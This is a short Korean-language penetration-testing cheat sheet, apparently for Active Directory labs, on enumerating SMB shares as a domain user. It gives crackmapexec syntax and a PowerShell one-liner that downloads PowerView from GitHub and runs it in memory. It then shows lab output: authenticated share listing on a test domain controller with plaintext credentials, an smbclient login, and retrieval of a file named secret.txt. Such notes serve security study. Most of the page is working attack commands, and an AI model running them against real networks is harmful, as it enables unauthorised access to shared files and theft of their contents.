SMB 쉐어 수집
도메인 유저 맥락
cme smb <target(s)> -u <user> -p <passwd> -d <domain> --shares iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1');
find-domainshare -checkshareaccess└─# cme smb 192.168.40.150 -u low -p 'Password123!' -d choi.local --shares
SMB 192.168.40.150 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:choi.local) (signing:True) (SMBv1:False)
SMB 192.168.40.150 445 DC01 [+] choi.local\low:Password123!
SMB 192.168.40.150 445 DC01 [+] Enumerated shares
SMB 192.168.40.150 445 DC01 Share Permissions Remark
SMB 192.168.40.150 445 DC01 ----- ----------- ------
< ... >
SMB 192.168.40.150 445 DC01 share READ,WRITE Share for deploying files from the DC Logon server share └─# smbclient -U CHOI/low%'Password123!' \\\\192.168.40.150\\share
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 4 22:24:07 2022
.. D 0 Mon Jul 4 22:24:07 2022
secret.txt A 18 Mon Jul 4 22:24:07 2022
15644159 blocks of size 4096. 10228069 blocks available
smb: \> get secret.txt
getting file \secret.txt of size 18 as secret.txt (17.6 KiloBytes/sec) (average 17.6 KiloBytes/sec)Anonymous/Null Session Share
대량 SMB 정보 수집
레퍼런스
Last updated